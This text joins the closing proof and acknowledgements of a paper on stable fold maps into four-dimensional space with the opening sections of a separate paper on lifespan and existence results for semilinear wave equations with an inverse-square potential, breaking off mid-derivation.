On the submodule generated by the first element, the homomorphism is a monomorphism. On the submodule generated by the second element, it is zero. This completes the proof on this fact on the kernel. We have $H_j( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_j({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \cong H_j(M;\mathbb{Z})$ for $j=2,5$ easily. Furthermore, by the argument on the kernel and the structure of the homomorphism, the group $H_3(M;\mathbb{Z})$ is free and its rank is\\
${\rm rank} \quad (H_3( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_3({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}))-1$.
We can know the integral homology group and the integral cohomology ring of $M$ by virtue of Poincar\'e duality theorem and the topological structures of the manifolds and the maps. Furthermore, for example, $H_4(M;\mathbb{Z})$ is generated by a homology class represented by the submanifold $S$.
By virtue of the arguments (together with some additional properties on topological structures), we have a desired stable fold map on a desired manifold in the case $(l_0,{l_0}^{\prime})=(2,1)$ with $(l_1,l_2,k_1,k_2)=(l,l,k,k)$. For example, we can take $a_1$ and $a_2$ as the duals of natural homology classes and $b_1$ as the dual of a class represented by $S$ before.
By considering a connected sum of the original manifolds instead, we have a desired result in the case $(l_0,{l_0}^{\prime})=(2,2)$ with $(l_1,l_2,k_1,k_2)=(l,l,k,k)$. In this case we define $P^{\prime}:=\{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid x_1 \geq 2.75.\}$ of ${\mathbb{R}}^4$ instead of $P$ to obtain a desired map and a manifold. We can also consider original round fold maps in Proposition \ref{prop:2} or \ref{prop:3} and take $P^{\prime}$ instead as before to obtain a desired map and a manifold. We have a desired stable fold map.
We can easily see that we can generalize the proofs to general cases. In fact it is sufficient to consider suitable iterations of the presented fundamental operations (in suitably and naturally generalized ways) for given stable maps into ${\mathbb{R}}^4$.
This completes the proof.
\end{proof}
\section{Acknowledgement.}
\label{sec:3}
\thanks{This work was partially supported by "The Sasakawa Scientific Research Grant" (2020-2002 : https://www.jss.or.jp/ikusei/sasakawa/). The author is a member of JSPS KAKENHI Grant Number JP17H06128 "Innovative research of geometric topology and singularities of differentiable mappings" (Principal Investigator: Osamu Saeki). This work is also supported by the project. We declare that data supporting our present work is all in the present paper.}
| 2024-02-18T23:40:19.205Z | 2021-10-01T02:07:30.000Z | algebraic_stack_train_0000 | 2,038 | 4,970 |
|
proofpile-arXiv_065-10035 | \section{Introduction}
In this paper,
we are interested in a kind of semilinear wave equations with the inverse-square potential
and small, spherically symmetric initial data, which has the form
\begin{Eq}\label{Eq:U_o}
\begin{cases}
\partial_t^2 U -\Delta U+Vr^{-2}U=|U|^p, \quad r=|x|,~(t,x)\in{\mathbb{R}}_+\times{\mathbb{R}}^n;\\
U(0,x)=\varepsilon U_0(r),\quad U_t(0,x)=\varepsilon U_1(r);
\end{cases}
\end{Eq}
where $p>1$,
$n\geq 2$,
$0<\varepsilon\ll 1$
and $V\geq -(n-2)^2/4$ is a constant.
We will study the long-time existence and global solvability of \eqref{Eq:U_o}.
Specifically,
setting $T_\varepsilon$ to be the lifespan of the solution to \eqref{Eq:U_o},
we want to know its relation with $n$, $V$, $p$ and $\varepsilon$.
When $V=0$,
this problem reduces to the well known \emph{Strauss} conjecture,
which has been extensively studied in a long history.
See, e.g., \cite{MR1481816}, \cite{MR1804518}, \cite{MR3247303}, \cite{MR3169791} and the references therein for more information.
Let $p_S(n)$ be the positive root of $h_S(p;n)=0$,
where
\begin{Eq*}
h_S(p;n):=(n-1)p^2-(n+1)p-2.
\end{Eq*}
From the early researches,
under some natural requirements of $(U_0,U_1)$,
it is known that
\begin{Eq*}
\kl\{\begin{aligned}
T_\varepsilon\approx &\varepsilon^{\frac{2p(p-1)}{h_S(p)}},&&\max(1,\frac{2}{n-1})<p<p_S;\\
\ln T_\varepsilon\approx& \varepsilon^{-p(p-1)},&&p=p_S;\\
T_\varepsilon=&\infty, && p>p_S.
\end{aligned}\kr.
\end{Eq*}
Here and in what follows,
we denote $x\lesssim y$ and $y\gtrsim x$ if $x\leq Cy$ for some $C>0$,
independent of $\varepsilon$,
which may change from line to line.
We also denote $x\approx y$ if $x\lesssim y\lesssim x$.
When there exists a potential, i.e.,
$V\neq 0$,
the problem becomes much more complicated.
This is partly because that the inverse-square potential is in the same scaling as the wave operator,
which means that it provides a comparable effect to the evolution of the solution.
Meanwhile, the extra singularity at the origin also needs to be taken care of.
The elliptic operator $-\Delta+V|x|^{-2}$ has been studied in several different equations related to physics and geometry,
such as in heat equations (see, e.g., \cite{MR1760280}), in quantum mechanics (see, e.g., \cite{MR0397192}), in Schr\"odinger equations and wave equations.
Among others, the \emph{Strichartz} estimates for wave equations with the inverse square potential have been well-developed in many works.
Such result was firstly developed in \cite{MR1952384} for the wave equations with radial data.
Shortly afterwards, the radial requirement was removed by \cite{MR2003358}.
A decade later, the \emph{Strichartz} estimates with angular regularity were developed in \cite{MR3139408}.
Despite these results, we expect that these kind of estimates still have room to improve and generalize.
Turn back to the equation \eqref{Eq:U_o}.
Note that the initial data of \eqref{Eq:U_o} are spherically symmetric,
which suggest that the solution $U$ is also spherically symmetric.
Let $$A:=2+\sqrt{(n-2)^2+4V},~u(t,r):=r^{\frac{n-A}{2}}U(t,x).$$
A formal calculation shows that $u$ satisfies the equation
\begin{Eq}\label{Eq:u_o}
\begin{cases}
\partial_t^2 u -\Delta_Au=r^{\frac{(A-n)p+n-A}{2}}|u|^p,\quad (t,r)\in {\mathbb{R}}_+^2,\\
u(0,x)=\varepsilon r^{\frac{n-A}{2}}U_0(r),\quad u_t(0,x)=\varepsilon r^{\frac{n-A}{2}}U_1(r),
\end{cases}
\end{Eq}
where $\Delta_A:=\partial_r^2+(A-1)r^{-1}\partial_r$.
When $A\in {\mathbb{Z}}_+$, the operator $\Delta_A$ agrees with the $A$-dimensional Laplace operator (for radial functions),
from which we consider the parameter $A$ as the spatial ``dimension" for the equation after the transformation.
The blow-up result of \eqref{Eq:U_o} has been systematically considered in the previous paper \cite{MR4130094} by the first author and his collaborators.
Here we define
\begin{Eq*}
h_F(p;n):=np-(n+2)
\end{Eq*}
with $p_F(n)$ be the root of $h_F(p;n)=0$, and use abbreviations
\begin{Eq*}
&p_d=p_d(A):=\frac{2}{A-1},\quad p_F=p_F((n+A-2)/2),\quad p_S=p_S(n),\\
&h_S=h_S(p;n),\quad h_F=h_F(p;(n+A-2)/2),
\end{Eq*}
if these do not lead to ambiguity.
Then, under some requirements of initial data, there exists a constant $C=C(p;n,A)$
such that when $(3-A)(A+n-2)<8$, where $p_d<p_F<p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p\leq p_d;\\
C\varepsilon^{\frac{2p(p-1)}{h_S}},&p_d<p<p_S;\\
\exp\kl(C \varepsilon^{-p(p-1)}\kr),&p=p_S.
\end{cases}
\end{Eq*}
When $(3-A)(A+n+2)=8$, where $p_d=p_F=p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p<p_F;\\
\exp\kl(C \varepsilon^{-(p-1)}\kr),&p=p_F.
\end{cases}
\end{Eq*}
When $(3-A)(A+n+2)>8$, where $p_d>p_F>p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p<p_F;\\
\exp\kl(C \varepsilon^{-(p-1)}\kr),&p=p_F.
\end{cases}
\end{Eq*}
This result suggests that two effects will impact the lifespan.
For simplicity we call one \emph{Strauss} effect
and the other \emph{Fujita} effect, since $p_S$ is the \emph{Strauss} exponent and $p_F$ is the \emph{Fujita} exponent. On the other hand, we remark that $p_F((n+A-2)/2)=p_G((n+A)/2)$, where $p_G(n)=\frac{n+1}{n-1}$ is the \emph{Glassey} exponent.
The \emph{Glassey} exponent appears in the wave equations with derivative nonlinearity $|\partial_t u|^p$, which suggests that there may exist some relation between the \emph{Glassey} conjecture (see, e.g., \cite{W15}) and our problem.
For the existence part, there are also a few studies of \eqref{Eq:U_o}.
Using \emph{Strichartz} estimates, the global existence result was shown in \cite{MR1952384, MR2003358} if
\begin{Eq*}
p\geq \frac{n+3}{n-1},\quad \frac{A-2}{2}>\frac{n-2}{2}-\frac{2}{p-1}+\max\kl\{\frac{1}{2p},\frac{1}{(n+1)(p-1)}\kr\}.
\end{Eq*}
Later, the result was further extended in \cite{MR3139408}, where the global result in the radial case was obtained for $1+\frac{4n}{(n+1)(n-1)}<p<\frac{n+3}{n-1}$,
\begin{Eq*}
&V>\max\kl\{\frac{1}{(n-1)^2}-\frac{(n-2)^2}{4},\frac{n}{q_0}\kl(\frac{n}{q_0}-n+2\kr),\kl(\frac{n}{r_0}-n\kr)\kl(\frac{n}{r_0}-2\kr)\kr\},\\
&q_0=\frac{(p-1)(n+1)}{2},\qquad r_0=\frac{(n+1)(p-1)}{2p}.
\end{Eq*}
However,
compared with the result of the problem without potential, in general,
it seems that the sharp result for \eqref{Eq:U_o}
could not be obtained by the \emph{Strichartz} estimates without weight.
On the other hand, there is also a gap between these results and the blow-up result we mentioned before.
Now,
we are in a juncture to state our main results in this paper.
Firstly, we give the definition of the solution,
and see \Se{Se:2} for further discussions.
\begin{definition}\label{De:U_w}
We call $U$ is a weak solution of \eqref{Eq:U_o} in $[0,T]\times {\mathbb{R}}^n$
if $U$ satisfies
\begin{Eq}\label{Eq:U_i}
\int_0^T\int_{{\mathbb{R}}^n} |U|^p\Phi \d x\d t
=&\int_0^T\int_{{\mathbb{R}}^n} U \kl(\partial_t^2-\Delta+\frac{V}{r^2}\kr)\Phi \d x\d t\\
&-\varepsilon\int_{{\mathbb{R}}^n} (U_1\Phi(0,x)-U_0\partial_t\Phi(0,x))\d x,
\end{Eq}
for any $\Phi(t,x)\in \kl\{r^{\frac{A-n}{2}}\phi(t,x):\phi\in C_0^\infty((-\infty,T)\times {\mathbb{R}}^n)\kr\}$.
\end{definition}
For convenience we introduce the notations
\begin{Eq*}
p_m:=\frac{n+1}{n-1},\qquad
p_M:=\begin{cases}\frac{n+1}{n-A}&n>A\\\infty&n\leq A\end{cases},\qquad
p_t:=\frac{n+A}{n-1},\qquad
p_{conf}:=\frac{n+3}{n-1}.
\end{Eq*}
Then, we give the existence results for $A\in[2,3]$.
\begin{theorem}\label{Th:M_1}
Set $2\leq n$,
$2\leq A\leq 3$ and $p_m<p<p_M$.
Assume that the initial data satisfy
\begin{Eq}\label{Eq:ir_1}
\|r^\frac{n-A+2}{2}U_0'(r)\|_{L_r^\infty}+\|r^\frac{n-A}{2}U_0(r)\|_{L_r^\infty}+\|r^\frac{n-A+2}{2}U_1(r)\|_{L_r^\infty}<\infty,
\end{Eq}
and supported in $[0,1)$, where $L_r^p$ stands for $L^p((0,\infty),\d r)$.
Then, there exists an $\varepsilon_0>0$ and a constant $c=c(p;n,A)$,
such that for any $0<\varepsilon<\varepsilon_0$, there is a weak solution $U$ of \eqref{Eq:U_o} in $[0,T_*)\times {\mathbb{R}}^n$ which satisfies
\begin{Eq*}
r^{\frac{n-A}{2}}U\in L_{loc;t,x}^\infty ([0,T_*)\times {\mathbb{R}}^n).
\end{Eq*}
Where, when $(3-A)(A+n+2)<8$, we have $p_d<p_F<p_S$, then
\begin{Eq}\label{Eq:Main_7}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_d;\\
c\varepsilon^\frac{p-1}{h_F} |\ln\varepsilon|^{\frac{1}{h_F}},&p=p_d;\\
c\varepsilon^\frac{2p(p-1)}{h_S},&p_d<p<p_S;\\
\exp\kl(c\varepsilon^{p(1-p)}\kr),&p=p_S;\\
\infty,&p>p_S.
\end{cases}
\end{Eq}
When $(3-A)(A+n+2)=8$, we have $p_d=p_F=p_S$, then
\begin{Eq}\label{Eq:Main_8}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_d;\\
\exp\kl(c\varepsilon^{\frac{1-p}{2}}\kr),&p=p_d;\\
\infty,&p>p_d.
\end{cases}
\end{Eq}
When $(3-A)(A+n+2)>8$, we have $p_d>p_F>p_S$, then
\begin{Eq}\label{Eq:Main_9}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_F;\\
\exp\kl(c\varepsilon^{1-p}\kr),&p=p_F;\\
\infty,&p>p_F.
\end{cases}
\end{Eq}
\end{theorem}
Next, we give the existence results for $A\in[3,\infty)$.
\begin{theorem}\label{Th:M_2}
Set $2\leq n$, $A\geq 3$ and $1<p<p_{conf}$
and define $T_*$ by
\begin{Eq}\label{Eq:Main_6}
T_*=\begin{cases}
c\varepsilon^\frac{2p(p-1)}{h_S},&1<p<p_S;\\
\exp\kl(c\varepsilon^{p(1-p)}\kr),&p=p_S;\\
\infty,&p>p_S,
\end{cases}
\end{Eq}
which is the same as \eqref{Eq:Main_7} since that $p_d\leq 1$ when $A\geq3$.
Assume that $1<p\leq p_m$ and
the initial data $(U_0,U_1)$ satisfy
\begin{Eq}\label{Eq:ir_21}
\|r^\frac{n-1}{2}U_0(r)\|_{L_r^p}+\|r^\frac{n+1}{2}U_1(r)\|_{L_r^p}<\infty,
\end{Eq}
and supported in $[0,1)$.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|(1+t)^{\frac{(n-1)p-n-1}{2p}}r^{\frac{n+1}{2p}}U\|_{L_t^\infty L_r^p ([0,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p_m\leq p< p_S$, the initial data satisfy \eqref{Eq:ir_21} and
\begin{Eq}\label{Eq:ir_22}
\|r^{\frac{n-1}{2}+\frac{1}{p}}U_0(r)\|_{L_r^\infty}+\|r^{\frac{n+1}{2}+\frac{1}{p}}U_1(r)\|_{L_r^\infty}<\infty,
\end{Eq}
with no compact support requirement.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{n+1}{2p}}U\|_{L_t^\infty L_r^p ([0,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p=p_S$,
and the initial data satisfy \eqref{Eq:ir_21} and \eqref{Eq:ir_22} for $p=p_S$ as well as some $p>p_S$.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|r^{\frac{n+1}{2p_S}}U\|_{L_t^{p_S^2}L_r^{p_S}([0,1]\times {\mathbb{R}}_+)}+
\|t^{\frac{1}{p_S^2}}r^{\frac{n+1}{2p_S}}U\|_{L_t^\infty L_r^{p_S} ([1,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p>p_S$ and the initial data satisfy
\begin{Eq*}
\|r^\frac{n-1}{2}U_0(r)\|_{L_r^q}+\|r^\frac{n+1}{2}U_1(r)\|_{L_r^q}<\infty,\qquad q:=\frac{2(p-1)}{(n+3)-(n-1)p}.
\end{Eq*}
Then there exists an $\varepsilon_0>0$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in ${\mathbb{R}}_+\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|r^{\frac{n+1}{2p}}U\|_{L_t^{pq} L_r^p({\mathbb{R}}_+\times {\mathbb{R}}_+)}+\|r^{\frac{n-1}{2}}U\|_{L_t^{\infty} L_r^q({\mathbb{R}}_+\times {\mathbb{R}}_+)}<\infty.
\end{Eq*}
\end{theorem}
\begin{remark}
Here we use a graph with $n\in[4,8]$ as an example
to describe the results we got.
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{n=7.png}
\end{figure}
The white area stands for the region that the solution is global,
the light gray area ($p>p_d$) stands for the region that the \emph{Strauss} effect plays role,
the dark gray area ($p<p_d$) stands for the region that \emph{Fujita} effect plays role,
and the chessboard area stands for the region that we can not deal with due to the technical difficulty.
When $n\in[2,3]$,
we find $\frac{3n-1}{n+1}\leq 2$,
which means that the dark gray area does not exist for $p\geq p_m=\frac{n+1}{n-1}$.
When $n=2$ we have $p_M=\infty$ for all $A\geq 2$.
This means that the lower right chessboard area does not exist.
When $n\in[9,\infty)$, we find $1+\frac{4}{n}>\frac{n+1}{n-2}$,
which means that the dark gray area will be slightly blocked by the lower right chessboard area.
Here we list these situations as the figures below.
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{n=2,3,10.png}
\end{figure}
\end{remark}
\begin{remark}
The nonlinear term $|U|^p$ in \eqref{Eq:U_o} can be replaced by any $F_p(U)$ which satisfies
\begin{Eq*}
|F_p(U)|\lesssim |U|^p,\qquad |F_p(U_1)-F_p(U_2)|\lesssim |U_1-U_2|\max(|U_1|,|U_2|)^{p-1},
\end{Eq*}
and typical examples include $F_p(U)=\pm|U|^p$ and $F_p(U)=\pm|U|^{p-1}U$.
The only difference is that the constants in the result and proof need to be changed.
\end{remark}
In lower dimension, the weighted $L^\infty$ norm estimate,
which firstly appeared in \cite{MR535704},
is very useful to prove the long-time existence result.
In \cite{MR2025737}, the authors showed long-time existence results for a two-dimensional wave system,
where they use a trick that they take different weights in different zones.
In this paper, we further develop such method, adapted for the wave equations with potential,
and finally show the long-time existence result for $A\in[2,3]$.
On the one hand,
our result is sharp in general, in the sense that
our lower bound of the lifespan has the same order as the upper bound estimates as appeared in the blow-up results, except for the borderline case $p=p_d$.
On the other hand, we notice that $A=2$, which means $V=-(n-2)^2/4$, is an extreme case to the operator $-\Delta+Vr^{-2}$.
In this case, the operator is still non-negative but not positive any more, which
makes the implementation of the classical energy method more difficult.
However, our approach could handle this extreme case as well as the usual case that $V>-(n-2)^2/4$, without any additional difficulties.
In higher dimension ($n\geq 3$),
it is well known that the weighted \emph{Strichartz} estimates
is a helpful tool for the Strauss conjecture, particularly for the high dimensional case (see, e.g., \cite{MR1408499},
\cite{MR1481816} and \cite{MR1804518}).
In this paper, we adapt the approach of \cite{MR1408499} to the `fractional dimension' $A\geq 3$,
and give the long-time existence result for $A\in[3,\infty)$, which gives the sharp lower bound of the lifespan.
After comparing all the results we knew, we find that
the determination of the exact lifespan can be considered by a competition between
the \emph{Strauss} effect and the \emph{Fujita} effect.
When $p>p_d$, the \emph{Strauss} effect is stronger,
where the final result is only determined by the \emph{Strauss} exponent.
When $p<p_d$, the \emph{Fujita} effect is stronger,
the final result is only determined by the \emph{Fujita} exponent.
Compared with the results for the problem without potential,
it seems that the requirement $p>p_m$ in \Th{Th:M_1} is only a technical restriction.
Also, compared with the result of $2$-dimensional \emph{Strauss} conjecture with $p=2$ (though $2\leq p_m(2)=3$),
we expect that the both the lower bound and the upper bound of lifespan for $p=p_d$ can be further improved.
On the other hand, it will be interesting to investigate
the problem with non-radial data, as well as the problem with more general potential functions.
It is known that when $n=3, 4$ and the potential function is of short range, the similar long-time existence results (including non-radial case) as in
\Th{Th:M_2} are available in \cite{MW17}.
When the potential function has asymptotic behavior $Vr^{-2}$ with $V>0$, the subcritical blow-up result ($p<\max(p_S, p_F)$) was recently obtained in \cite{lai2021lifespan}.
The existence theory for the corresponding problem remains largely open.
Another interesting problem is whether or not the Cauchy problem \eqref{Eq:U_o} admits global solutions for initial data with lowest possible regularity.
For example, when $V=0$ and $2\leq n\leq 4$, such a result is available for $p\in(p_S,p_{conf}]$
with small, spherically symmetric data in the scale-invariant $(\dot H^{s_c}\times \dot H^{s_c-1})$ space ($s_c=n/2-2/(p-1)$).
See \cite{MR2455195,MR2333654,MR2769870} for more discussion.
Here we should remark that the global result in \Th{Th:M_2} reaches the lowest regularity requirement (in the sense of scale invariance, though not in $\dot H^s$ space), but \Th{Th:M_1} still has room for improvement.
The rest of the paper is organized as follows. In \Se{Se:2} we give a detailed discussion of \eqref{Eq:u_o} and its solution.
In \Se{Se:3}, we restrict $A\in[2,3]$ and show the long-time existence of the solution by weighted $L^\infty$ norm estimate.
In \Se{Se:4}, we move to situation $A\in[3,\infty)$ and establish the long-time existence result through weighted \emph{Strichartz} type estimate.
\section{Some preparations}\label{Se:2}
In this section,
we transfer \eqref{Eq:U_o} into the equivalent equation \eqref{Eq:u_o},
and explain the rationality of \De{De:U_w}.
After that, we show the formula of the solution and analyze the properties of this solution.
\subsection{The definition of weak solution}
As we said before, after introducing $u(t,r):=r^{\frac{n-A}{2}}U(t,x)$,
a formal calculation shows that $u$ satisfied the equation \eqref{Eq:u_o}.
We pause here and consider its linear form equation
\begin{Eq}\label{Eq:u_l}
\begin{cases}
\partial_t^2 u -\Delta_Au=F(t,r),\quad r\in {\mathbb{R}}_+\\
u(0,r)=f(r),\quad u_t(0,r)=g(r),
\end{cases}
\end{Eq}
with $f$, $g$, $F$ good enough.
When $A\in {\mathbb{Z}}_+$,
equation \eqref{Eq:u_l} can be considered as an $A$-dimensional spherically symmetric wave equation,
where $u(t,r)$ is a classical solution in $[0,T]$
if $u(t,r)$ satisfies \eqref{Eq:u_l} and $u(t,|x|)\in C^2([0,T]\times {\mathbb{R}}^A)$.
Thus,
for general situation,
we should say $u$ is a classical solution of \eqref{Eq:u_l} in $[0,T]$
if $u\in C^2([0,T]\times {\mathbb{R}}_+)$, $\partial_ru(t,0)=0$ and $u$ satisfies \eqref{Eq:u_l} point wise.
Here we give a quick proof to show that such classical solution is unique.
When $f,g,F=0$, multiplying $r^{A-1}u_t$ to both sides of \eqref{Eq:u_l} and integrating them in $\Omega:=\{(t,r):0<t<T, 0<r<R+T-t\}$, we see
\begin{Eq*}
0=\frac{1}{2}\kl.\int_0^Rr^{A-1}\kl(u_t^2+u_r^2\kr)\d r\kr|_{t=T}+\frac{1}{2\sqrt{2}}\int\limits_{t+r=T+R\atop 0<t<T}r^{A-1}(u_t-u_r)^2\d \sigma_{t,r}.
\end{Eq*}
This gives the uniqueness.
After the discussion of the classical solution,
we naturally say $u$ is the weak solution of \eqref{Eq:u_l} if $u$ satisfies
\begin{Eq}\label{Eq:u_i}
\int_0^T\int_0^\infty F\phi r^{A-1}\d r\d t
=&\int_0^T\int_0^\infty u \kl(\partial_t^2-\Delta_A\kr)\phi r^{A-1}\d r\d t\\
&-\int_0^\infty (g\phi(0,r)-f\partial_t\phi(0,r))r^{A-1}\d r,
\end{Eq}
for any $\phi(t,r)\in C_0^\infty\kl((-\infty,T)\times {\mathbb{R}}\kr)$
with $\partial_r^{1+2k} \phi(t,0)=0$ for any $k\in {\mathbb{N}}_0$.
Also, set $u=r^{\frac{n-A}{2}}U$, $\phi=r^\frac{n-A}{2}\Phi$,
$f=\varepsilon r^{\frac{n-A}{2}} U_0$, $g=\varepsilon r^{\frac{n-A}{2}} U_1$
and $F=r^{\frac{(A-n)p+n-A}{2}}|u|^p$,
it is obvious that $u$ satisfies \eqref{Eq:u_i} is equivalent to that
$U$ satisfies \eqref{Eq:U_i} with
$\Phi(t,x)\in \kl\{r^{\frac{A-n}{2}}\phi(t,x):\phi\in C_0^\infty((-\infty,T)\times {\mathbb{R}}^n)\kr\}$.
That's the reason we use \De{De:U_w} as the definition of weak solution of \eqref{Eq:U_o}.
\subsection{The formula of classical solution}
In this section we are going to give the formula of solution to \eqref{Eq:u_l}.
We denote by $u_g$, $u_f$ and $u_F$ the solution of \eqref{Eq:u_l} with only $g\neq 0$, $f\neq 0$ and $F\neq 0$, respectively.
\begin{lemma}\label{Le:u_e}
Assume that $f,g, F$ are smooth enough. Then, the classical solution of \eqref{Eq:u_l} is $u=u_f+u_g+u_F$ with
\begin{Eq*}
u_g=&r^{\frac{1-A}{2}} \int_{0}^{t+r}\rho ^{\frac{A-1}{2}}g(\rho) I_A(\mu) \d \rho,\quad
\mu=\frac{r^2+\rho^2-t^2}{2r\rho},\\
u_f=&r^{\frac{1-A}{2}} \partial_t\int_{0}^{t+r}\rho ^{\frac{A-1}{2}}g(\rho) I_A(\mu) \d \rho,\quad
\mu=\frac{r^2+\rho^2-t^2}{2r\rho},\\
u_F=&r^{\frac{1-A}{2}} \int_0^t\int_{0}^{t-s+r}\rho ^{\frac{A-1}{2}}F(s,\rho) I_A(\mu) \d \rho\d s,\quad
\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho},\\
I_A(\mu):=&\frac{2^{\frac{1-A}{2}}}{\Gamma\kl(\frac{A-1}{2}\kr)} \int_{-1}^{1} \mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)\sqrt{1-\lambda^2}^{A-3}\d \lambda.
\end{Eq*}
\end{lemma}
\begin{remark}
Here $\mathcal{X}_+^\alpha$ is a distribution, which has the expression
\begin{Eq*}
\mathcal{X}_+^\alpha(x)=\begin{cases}
0,&x<0,~\alpha>-1,\\
\frac{x^\alpha}{\Gamma(\alpha+1)},& x>0,~\alpha>-1,\\
\frac{\d~}{\d x}\mathcal{X}_+^{\alpha+1}(x), &\alpha\leq -1,\\
\end{cases}
\end{Eq*}
with $\Gamma$ the Gamma function and $\frac{\d~}{\d x}$ the weak derivative.
\end{remark}
\begin{remark}
Consider $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$. When $r> t$, we have
\begin{Eq*}
\mu|_{0<\rho<r-t}~>~\mu|_{\rho=r-t}=1~>~\mu|_{r-t<\rho<t+r}(>0)~<~\mu|_{\rho=t+r}=1~<~\mu|_{t+r<\rho},
\end{Eq*}
and when $r< t$, we have
\begin{Eq*}
\mu|_{0<\rho<t-r}~<~\mu|_{\rho=t-r}=-1~<~\mu|_{t-r<\rho<t+r}~<~\mu|_{\rho=t+r}=1~<~\mu|_{t+r<\rho}.
\end{Eq*}
By \Le{Le:I_p} below, the $\int_0^{t+r}$ in the formula of $u_g$ and $u_f$ in \Le{Le:u_e} can be replaced by $\int_{\max\{0,r-t\}}^{t+r}$, and $\int_0^{t-s+r}$ in $u_F$ can be replaced by $\int_{\max\{0,r+s-t\}}^{t-s+r}$ .
\end{remark}
To show \Le{Le:u_e}, we need to explore some properties of $I_A(\mu)$.
\begin{lemma}\label{Le:I_p}
For $A>1$ and $I_A(\mu)$ defined in \Le{Le:u_e}, we have
\begin{Eq}
I_A(1-)=\frac{1}{2},\qquad I_A(\mu)=0~for~\mu>1.\label{Eq:I_p_1}
\end{Eq}
Moreover,
for $A\not\in 1+2{\mathbb{Z}}_+$ with some constants $C_0$ and $C_{1}$ depending on $A$,
we have
\begin{alignat}{2}
|\partial_{\mu}^mI_A(\mu)|\lesssim&(1-\mu)^{\frac{1-A}{2}-m}, &\qquad& \mu\leq -2,m=0,1;\label{Eq:I_p_2}\\
I_A(\mu)=&C_0\ln|1+\mu|+O(1),&\qquad& -2<\mu<1;\label{Eq:I_p_3}\\
\partial_\mu I_A(\mu)= &C_1(1+\mu)^{-1}+O\kl(|\ln|1+\mu||+1\kr),&\qquad& -2<\mu<1.\label{Eq:I_p_4}
\end{alignat}
On the other hand, for $A\in 1+2{\mathbb{Z}}_+$,
we have
\begin{alignat}{2}
I_A(\mu)=&0,&\qquad &\mu<-1;\label{Eq:I_p_5}\\
|\partial_\mu^{m}I_A(\mu)|\lesssim& 1,&\qquad &-1<\mu<1,~m=0,1.\label{Eq:I_p_6}
\end{alignat}
\end{lemma}
\subsection{Proof of \Le{Le:u_e}}\label{Pf_u_e}
Here we only show the proof of $u=u_g$ with $f=F=0$, the other formulas can be demonstrated by a direct calculation and \emph{Duhamel}'s principle. Without loss of generality we only deal with the case $A\not\in {\mathbb{Z}}_+$.
\setcounter{part0}{0}
\value{parta}[Alternative expressions of $u_g$]
Before the proof, we give an alternative expressions of $u_g$ constructed in \Le{Le:u_e}.
We first introduce a change of the variables
\begin{Eq*}
&(\rho,\lambda)=\kl(\sqrt{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda},~\frac{r-\tilde \rho\tilde\lambda}{\sqrt{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda}}\kr)\\
\Leftrightarrow&(\tilde\rho,\tilde\lambda)=\kl(\sqrt{r^2+ \rho^2-2r \rho\lambda},~\frac{r- \rho\lambda}{\sqrt{r^2+ \rho^2-2r \rho\lambda}}\kr).
\end{Eq*}
A direct calculation shows that the map $(\rho,\lambda)\mapsto(\tilde\rho,\tilde\lambda)$ satisfies the relation
\begin{Eq*}
\kl|\frac{\d(\rho,\lambda)}{\d(\tilde\rho,\tilde\lambda)}\kr|=\frac{\tilde\rho^2}{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda}=\frac{\tilde\rho^2}{\rho^2},\qquad \rho^2(1-\lambda^2)=\tilde\rho^2(1-\tilde\lambda^2),
\end{Eq*}
and is a bijection from $(0,\infty)\times(-1,1)$ to itself.
For $A=1+2k+2\theta$ with $k\in {\mathbb{N}}_0$ and $\theta\in(0,1)$, we substitute $I_A(\mu)$ into $u_g$.
Noticing $\mathcal{X}_+^{\alpha}$ is a homogeneous distribution of degree $\alpha$, we find
\begin{Eq*}
